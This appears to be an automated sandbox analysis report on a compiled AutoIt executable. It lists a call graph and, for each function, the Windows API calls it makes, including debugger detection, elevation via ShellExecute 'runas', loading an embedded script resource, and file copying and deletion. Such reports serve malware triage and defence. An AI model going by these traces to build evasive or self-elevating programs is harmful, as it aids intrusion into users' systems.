99970->99903 99971->99903 99972->99876 99973->99873 99974->99876 99975->99951 99976->99951 99977->99935 99978 601066 99983 60f8cf 99978->99983 99980 60106c 99981 622f80 __cinit 67 API calls 99980->99981 99982 601076 99981->99982 99984 60f8f0 99983->99984 100016 620143 99984->100016 99988 60f937 99989 6077c7 59 API calls 99988->99989 99990 60f941 99989->99990 99991 6077c7 59 API calls 99990->99991 99992 60f94b 99991->99992 99993 6077c7 59 API calls 99992->99993 99994 60f955 99993->99994 99995 6077c7 59 API calls 99994->99995 99996 60f993 99995->99996 99997 6077c7 59 API calls 99996->99997 99998 60fa5e 99997->99998 100026 6160e7 99998->100026 100002 60fa90 100003 6077c7 59 API calls 100002->100003 100004 60fa9a 100003->100004 100054 61ffde 100004->100054 100006 60fae1 100007 60faf1 GetStdHandle 100006->100007 100008 6449d5 100007->100008 100009 60fb3d 100007->100009 100008->100009 100011 6449de 100008->100011 100010 60fb45 OleInitialize 100009->100010 100010->99980 100061 666dda 64 API calls Mailbox 100011->100061 100013 6449e5 100062 6674a9 CreateThread 100013->100062 100015 6449f1 CloseHandle 100015->100010 100063 62021c 100016->100063 100019 62021c 59 API calls 100020 620185 100019->100020 100021 6077c7 59 API calls 100020->100021 100022 620191 100021->100022 100023 607d2c 59 API calls 100022->100023 100024 60f8f6 100023->100024 100025 6203a2 6 API calls 100024->100025 100025->99988 100027 6077c7 59 API calls 100026->100027 100028 6160f7 100027->100028 100029 6077c7 59 API calls 100028->100029 100030 6160ff 100029->100030 100070 615bfd 100030->100070 100033 615bfd 59 API calls 100034 61610f 100033->100034 100035 6077c7 59 API calls 100034->100035 100036 61611a 100035->100036 100037 620ff6 Mailbox 59 API calls 100036->100037 100038 60fa68 100037->100038 100039 616259 100038->100039 100040 616267 100039->100040 100041 6077c7 59 API calls 100040->100041 100042 616272 100041->100042 100043 6077c7 59 API calls 100042->100043 100044 61627d 100043->100044 100045 6077c7 59 API calls 100044->100045 100046 616288 100045->100046 100047 6077c7 59 API calls 100046->100047 100048 616293 100047->100048 100049 615bfd 59 API calls 100048->100049 100050 61629e 100049->100050 100051 620ff6 Mailbox 59 API calls 100050->100051 100052 6162a5 RegisterWindowMessageW 100051->100052 100052->100002 100055 655cc3 100054->100055 100056 61ffee 100054->100056 100073 669d71 60 API calls 100055->100073 100057 620ff6 Mailbox 59 API calls 100056->100057 100059 61fff6 100057->100059 100059->100006 100060 655cce 100061->100013 100062->100015 100074 66748f 65 API calls 100062->100074 100064 6077c7 59 API calls 100063->100064 100065 620227 100064->100065 100066 6077c7 59 API calls 100065->100066 100067 62022f 100066->100067 100068 6077c7 59 API calls 100067->100068 100069 62017b 100068->100069 100069->100019 100071 6077c7 59 API calls 100070->100071 100072 615c05 100071->100072 100072->100033 100073->100060 100075 601016 100080 604ad2 100075->100080 100078 622f80 __cinit 67 API calls 100079 601025 100078->100079 100081 620ff6 Mailbox 59 API calls 100080->100081 100082 604ada 100081->100082 100084 60101b 100082->100084 100087 604a94 100082->100087 100084->100078 100088 604aaf 100087->100088 100089 604a9d 100087->100089 100091 604afe 100088->100091 100090 622f80 __cinit 67 API calls 100089->100090 100090->100088 100092 6077c7 59 API calls 100091->100092 100093 604b16 GetVersionExW 100092->100093 100094 607d2c 59 API calls 100093->100094 100095 604b59 100094->100095 100096 607e8c 59 API calls 100095->100096 100105 604b86 100095->100105 100097 604b7a 100096->100097 100098 607886 59 API calls 100097->100098 100098->100105 100099 604bf1 GetCurrentProcess IsWow64Process 100100 604c0a 100099->100100 100102 604c20 100100->100102 100103 604c89 GetSystemInfo 100100->100103 100101 63dc8d 100115 604c95 100102->100115 100104 604c56 100103->100104 100104->100084 100105->100099 100105->100101 100108 604c32 100111 604c95 2 API calls 100108->100111 100109 604c7d GetSystemInfo 100110 604c47 100109->100110 100110->100104 100113 604c4d FreeLibrary 100110->100113 100112 604c3a GetNativeSystemInfo 100111->100112 100112->100110 100113->100104 100116 604c2e 100115->100116 100117 604c9e LoadLibraryA 100115->100117 100116->100108 100116->100109 100117->100116 100118 604caf GetProcAddress 100117->100118 100118->100116 100119 60568a 100120 605c18 59 API calls 100119->100120 100121 60569c 100120->100121 100122 605632 61 API calls 100121->100122 100123 6056aa 100122->100123 100125 6056ba Mailbox 100123->100125 100126 6081c1 61 API calls Mailbox 100123->100126 100126->100125 100127 60e70b 100130 60d260 100127->100130 100129 60e719 100131 60d27d 100130->100131 100148 60d4dd 100130->100148 100132 642b0a 100131->100132 100133 642abb 100131->100133 100153 60d2a4 100131->100153 100174 67a6fb 341 API calls __cinit 100132->100174 100136 642abe 100133->100136 100143 642ad9 100133->100143 100137 642aca 100136->100137 100136->100153 100172 67ad0f 341 API calls 100137->100172 100139 622f80 __cinit 67 API calls 100139->100153 100141 642cdf 100141->100141 100142 60d6ab 100142->100129 100143->100148 100173 67b1b7 341 API calls 3 library calls 100143->100173 100144 60d594 100166 608bb2 68 API calls 100144->100166 100148->100142 100179 66a0b5 89 API calls 4 library calls 100148->100179 100149 60d5a3 100149->100129 100150 642c26 100178 67aa66 89 API calls 100150->100178 100153->100139 100153->100142 100153->100144 100153->100148 100153->100150 100155 608620 69 API calls 100153->100155 100161 60a000 341 API calls 100153->100161 100162 6081a7 59 API calls 100153->100162 100164 6088a0 68 API calls __cinit 100153->100164 100165 6086a2 68 API calls 100153->100165 100167 60859a 68 API calls 100153->100167 100168 60d0dc 341 API calls 100153->100168 100169 609f3a 59 API calls Mailbox 100153->100169 100170 60d060 89 API calls 100153->100170 100171 60cedd 341 API calls 100153->100171 100175 608bb2 68 API calls 100153->100175 100176 609e9c 60 API calls Mailbox 100153->100176 100177 656d03 60 API calls 100153->100177 100155->100153 100161->100153 100162->100153 100164->100153 100165->100153 100166->100149 100167->100153 100168->100153 100169->100153 100170->100153 100171->100153 100172->100142 100173->100148 100174->100153 100175->100153 100176->100153 100177->100153 100178->100148 100179->100141 100180 60107d 100185 6071eb 100180->100185 100182 60108c 100183 622f80 __cinit 67 API calls 100182->100183 100184 601096 100183->100184 100186 6071fb __write_nolock 100185->100186 100187 6077c7 59 API calls 100186->100187 100188 6072b1 100187->100188 100189 604864 61 API calls 100188->100189 100190 6072ba 100189->100190 100216 62074f 100190->100216 100193 607e0b 59 API calls 100194 6072d3 100193->100194 100195 603f84 59 API calls 100194->100195 100196 6072e2 100195->100196 100197 6077c7 59 API calls 100196->100197 100198 6072eb 100197->100198 100199 607eec 59 API calls 100198->100199 100200 6072f4 RegOpenKeyExW 100199->100200 100201 63ecda RegQueryValueExW 100200->100201 100205 607316 Mailbox 100200->100205 100202 63ecf7 100201->100202 100203 63ed6c RegCloseKey 100201->100203 100204 620ff6 Mailbox 59 API calls 100202->100204 100203->100205 100213 63ed7e _wcscat Mailbox __NMSG_WRITE 100203->100213 100206 63ed10 100204->100206 100205->100182 100207 60538e 59 API calls 100206->100207 100208 63ed1b RegQueryValueExW 100207->100208 100209 63ed38 100208->100209 100211 63ed52 100208->100211 100210 607d2c 59 API calls 100209->100210 100210->100211 100211->100203 100212 607f41 59 API calls 100212->100213 100213->100205 100213->100212 100214 603f84 59 API calls 100213->100214 100215 607b52 59 API calls 100213->100215 100214->100213 100215->100213 100217 631b90 __write_nolock 100216->100217 100218 62075c GetFullPathNameW 100217->100218 100219 62077e 100218->100219 100220 607d2c 59 API calls 100219->100220 100221 6072c5 100220->100221 100221->100193

                                                    Executed Functions

                                                    Function 00603B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B7A
                                                    • IsDebuggerPresent.KERNEL32 ref: 00603B8C
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,006C62F8,006C62E0,?,?), ref: 00603BFD
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                      • Part of subcall function 00610A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C26,006C62F8,?,?,?), ref: 00610ACE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00603C81
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006B93F0,00000010), ref: 0063D4BC
                                                    • SetCurrentDirectoryW.KERNEL32(?,006C62F8,?,?,?), ref: 0063D4F4
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006B5D40,006C62F8,?,?,?), ref: 0063D57A
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0063D581
                                                      • Part of subcall function 00603A58: GetSysColorBrush.USER32(0000000F), ref: 00603A62
                                                      • Part of subcall function 00603A58: LoadCursorW.USER32(00000000,00007F00), ref: 00603A71
                                                      • Part of subcall function 00603A58: LoadIconW.USER32(00000063), ref: 00603A88
                                                      • Part of subcall function 00603A58: LoadIconW.USER32(000000A4), ref: 00603A9A
                                                      • Part of subcall function 00603A58: LoadIconW.USER32(000000A2), ref: 00603AAC
                                                      • Part of subcall function 00603A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AD2
                                                      • Part of subcall function 00603A58: RegisterClassExW.USER32(?), ref: 00603B28
                                                      • Part of subcall function 006039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A15
                                                      • Part of subcall function 006039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A36
                                                      • Part of subcall function 006039E7: ShowWindow.USER32(00000000,?,?), ref: 00603A4A
                                                      • Part of subcall function 006039E7: ShowWindow.USER32(00000000,?,?), ref: 00603A53
                                                      • Part of subcall function 006043DB: _memset.LIBCMT ref: 00604401
                                                      • Part of subcall function 006043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006044A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%i
                                                    • API String ID: 529118366-2620332297
                                                    • Opcode ID: 492229bb73fa6d6b815572fb4be6063cb0783793f3e30d26a0e8bad2f3d62d1d
                                                    • Instruction ID: 096015140cf1f0ec6c3d83b83a05e28f9890d8804972343eb51f9633098aa740
                                                    • Opcode Fuzzy Hash: 492229bb73fa6d6b815572fb4be6063cb0783793f3e30d26a0e8bad2f3d62d1d
                                                    • Instruction Fuzzy Hash: B551D370D44248AADB19ABB4EC05EFF7B7BEF04304F00516DF411A22E2DA785746CB69
                                                    Function 00604FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 983 604fe9-605001 CreateStreamOnHGlobal 984 605021-605026 983->984 985 605003-60501a FindResourceExW 983->985 986 605020 985->986 987 63dd5c-63dd6b LoadResource 985->987 986->984 987->986 988 63dd71-63dd7f SizeofResource 987->988 988->986 989 63dd85-63dd90 LockResource 988->989 989->986 990 63dd96-63ddb4 989->990 990->986
                                                    APIs
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00604EEE,?,?,00000000,00000000), ref: 00604FF9
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00604EEE,?,?,00000000,00000000), ref: 00605010
                                                    • LoadResource.KERNEL32(?,00000000,?,?,00604EEE,?,?,00000000,00000000,?,?,?,?,?,?,00604F8F), ref: 0063DD60
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00604EEE,?,?,00000000,00000000,?,?,?,?,?,?,00604F8F), ref: 0063DD75
                                                    • LockResource.KERNEL32(N`,?,?,00604EEE,?,?,00000000,00000000,?,?,?,?,?,?,00604F8F,00000000), ref: 0063DD88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT$N`
                                                    • API String ID: 3051347437-2945502020
                                                    • Opcode ID: 9be3bddbdbdbb9115286a89e92fec974f98a6de06c96c69954ab70e4cae321c3
                                                    • Instruction ID: d7c07da10f4bba2a285d4fec78491a35e184637dedc7f0f9e96d35050a701275
                                                    • Opcode Fuzzy Hash: 9be3bddbdbdbb9115286a89e92fec974f98a6de06c96c69954ab70e4cae321c3
                                                    • Instruction Fuzzy Hash: CD112A75240701BFD7258B65DC58F6B7BBAEBC9B51F204268F406D62A0DB61EC008BA0
                                                    Function 00604AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1047 604afe-604b5e call 6077c7 GetVersionExW call 607d2c 1052 604b64 1047->1052 1053 604c69-604c6b 1047->1053 1055 604b67-604b6c 1052->1055 1054 63db90-63db9c 1053->1054 1056 63db9d-63dba1 1054->1056 1057 604c70-604c71 1055->1057 1058 604b72 1055->1058 1060 63dba3 1056->1060 1061 63dba4-63dbb0 1056->1061 1059 604b73-604baa call 607e8c call 607886 1057->1059 1058->1059 1069 604bb0-604bb1 1059->1069 1070 63dc8d-63dc90 1059->1070 1060->1061 1061->1056 1063 63dbb2-63dbb7 1061->1063 1063->1055 1065 63dbbd-63dbc4 1063->1065 1065->1054 1067 63dbc6 1065->1067 1071 63dbcb-63dbce 1067->1071 1069->1071 1072 604bb7-604bc2 1069->1072 1073 63dc92 1070->1073 1074 63dca9-63dcad 1070->1074 1075 604bf1-604c08 GetCurrentProcess IsWow64Process 1071->1075 1076 63dbd4-63dbf2 1071->1076 1077 63dc13-63dc19 1072->1077 1078 604bc8-604bca 1072->1078 1079 63dc95 1073->1079 1081 63dc98-63dca1 1074->1081 1082 63dcaf-63dcb8 1074->1082 1083 604c0a 1075->1083 1084 604c0d-604c1e 1075->1084 1076->1075 1080 63dbf8-63dbfe 1076->1080 1089 63dc23-63dc29 1077->1089 1090 63dc1b-63dc1e 1077->1090 1085 604bd0-604bd3 1078->1085 1086 63dc2e-63dc3a 1078->1086 1079->1081 1087 63dc00-63dc03 1080->1087 1088 63dc08-63dc0e 1080->1088 1081->1074 1082->1079 1091 63dcba-63dcbd 1082->1091 1083->1084 1092 604c20-604c30 call 604c95 1084->1092 1093 604c89-604c93 GetSystemInfo 1084->1093 1094 63dc5a-63dc5d 1085->1094 1095 604bd9-604be8 1085->1095 1097 63dc44-63dc4a 1086->1097 1098 63dc3c-63dc3f 1086->1098 1087->1075 1088->1075 1089->1075 1090->1075 1091->1081 1104 604c32-604c3f call 604c95 1092->1104 1105 604c7d-604c87 GetSystemInfo 1092->1105 1096 604c56-604c66 1093->1096 1094->1075 1103 63dc63-63dc78 1094->1103 1100 63dc4f-63dc55 1095->1100 1101 604bee 1095->1101 1097->1075 1098->1075 1100->1075 1101->1075 1106 63dc82-63dc88 1103->1106 1107 63dc7a-63dc7d 1103->1107 1112 604c41-604c45 GetNativeSystemInfo 1104->1112 1113 604c76-604c7b 1104->1113 1108 604c47-604c4b 1105->1108 1106->1075 1107->1075 1108->1096 1111 604c4d-604c50 FreeLibrary 1108->1111 1111->1096 1112->1108 1113->1112
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00604B2B
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • GetCurrentProcess.KERNEL32(?,0068FAEC,00000000,00000000,?), ref: 00604BF8
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00604BFF
                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00604C45
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00604C50
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00604C81
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00604C8D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 7a0fbbff4a4ab7059661c81c9f2994d7237ea277541b41a98175892af16ff24f
                                                    • Instruction ID: 65b481231385d29aee7897f36039a3942f3492f0f778859ebc8a468c91bdc634
                                                    • Opcode Fuzzy Hash: 7a0fbbff4a4ab7059661c81c9f2994d7237ea277541b41a98175892af16ff24f
                                                    • Instruction Fuzzy Hash: F591C47198A7C0DEC735CB6894511ABFFE6AF25300F444A9DD1CB93B81D630E948C769
                                                    Function 0060E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Dtl$Dtl$Dtl$Dtl$Variable must be of type 'Object'.
                                                    • API String ID: 0-2238547659
                                                    • Opcode ID: 751c7579fe9863d73caaa8b29936710264bfa40192cab8076b987cd52610056e
                                                    • Instruction ID: 479830568cc98367195d1de04773ba15034edcd70efc9c7c879d41edcf114fc3
                                                    • Opcode Fuzzy Hash: 751c7579fe9863d73caaa8b29936710264bfa40192cab8076b987cd52610056e
                                                    • Instruction Fuzzy Hash: 69A29174A44225CFCB28CF58C581AAEB7B3FF58300F248459E916AB391D776ED42CB91
                                                    Function 00664696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,0063E7C1), ref: 006646A6
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 006646B7
                                                    • FindClose.KERNEL32(00000000), ref: 006646C7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
                                                    • Instruction ID: 9db032aa4ed19c1fe944a5afa9c278b84ba96d5c957e7211e8f748d83b8a02bb
                                                    • Opcode Fuzzy Hash: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
                                                    • Instruction Fuzzy Hash: 09E0DF328104006B8710A778EC5D8EA7B9E9E46335F200726F835C25E0EBB09E6086DA
                                                    Function 00610B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610BBB
                                                    • timeGetTime.WINMM ref: 00610E76
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610FB3
                                                    • TranslateMessage.USER32(?), ref: 00610FC7
                                                    • DispatchMessageW.USER32(?), ref: 00610FD5
                                                    • Sleep.KERNEL32(0000000A), ref: 00610FDF
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 0061105A
                                                    • DestroyWindow.USER32 ref: 00611066
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00611080
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 006452AD
                                                    • TranslateMessage.USER32(?), ref: 0064608A
                                                    • DispatchMessageW.USER32(?), ref: 00646098
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006460AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prl$prl$prl$prl
                                                    • API String ID: 4003667617-2208558280
                                                    • Opcode ID: 7f19f3f2d80f0fe249a711bb1cb4920afb721e26454ea5cfd0f6f1e87d401c1d
                                                    • Instruction ID: 81a4fe2734505bb6fbf31d6de3bebb7c4dc5dfb60a38c57fea246d8f1ce36a7f
                                                    • Opcode Fuzzy Hash: 7f19f3f2d80f0fe249a711bb1cb4920afb721e26454ea5cfd0f6f1e87d401c1d
                                                    • Instruction Fuzzy Hash: 16B2A470608741DFDB68DF24C884BAAB7E7BF85304F18491DF44A872A2DB71E885CB56
                                                    Function 006693DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 006691E9: __time64.LIBCMT ref: 006691F3
                                                      • Part of subcall function 00605045: _fseek.LIBCMT ref: 0060505D
                                                    • __wsplitpath.LIBCMT ref: 006694BE
                                                      • Part of subcall function 0062432E: __wsplitpath_helper.LIBCMT ref: 0062436E
                                                    • _wcscpy.LIBCMT ref: 006694D1
                                                    • _wcscat.LIBCMT ref: 006694E4
                                                    • __wsplitpath.LIBCMT ref: 00669509
                                                    • _wcscat.LIBCMT ref: 0066951F
                                                    • _wcscat.LIBCMT ref: 00669532
                                                      • Part of subcall function 0066922F: _memmove.LIBCMT ref: 00669268
                                                      • Part of subcall function 0066922F: _memmove.LIBCMT ref: 00669277
                                                    • _wcscmp.LIBCMT ref: 00669479
                                                      • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AAE
                                                      • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AC1
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006696DC
                                                    • _wcsncpy.LIBCMT ref: 0066974F
                                                    • DeleteFileW.KERNEL32(?,?), ref: 00669785
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0066979B
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006697AC
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006697BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: 675a66a6b14c2e482cd181d8f863669d145d3daf530259f402bf6f874a579bcf
                                                    • Instruction ID: 57c1a33237e4998edb24a5c8b87eb856523316a25706a599479672cb3e8d064e
                                                    • Opcode Fuzzy Hash: 675a66a6b14c2e482cd181d8f863669d145d3daf530259f402bf6f874a579bcf
                                                    • Instruction Fuzzy Hash: 80C13EB1D00229AADF65DF95CC85ADFB7BEEF45300F0040AAF609E7151DB309A858F65
                                                    Function 00603015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                    • RegisterClassExW.USER32(00000030), ref: 0060309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                    • LoadIconW.USER32(000000A9), ref: 006030F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
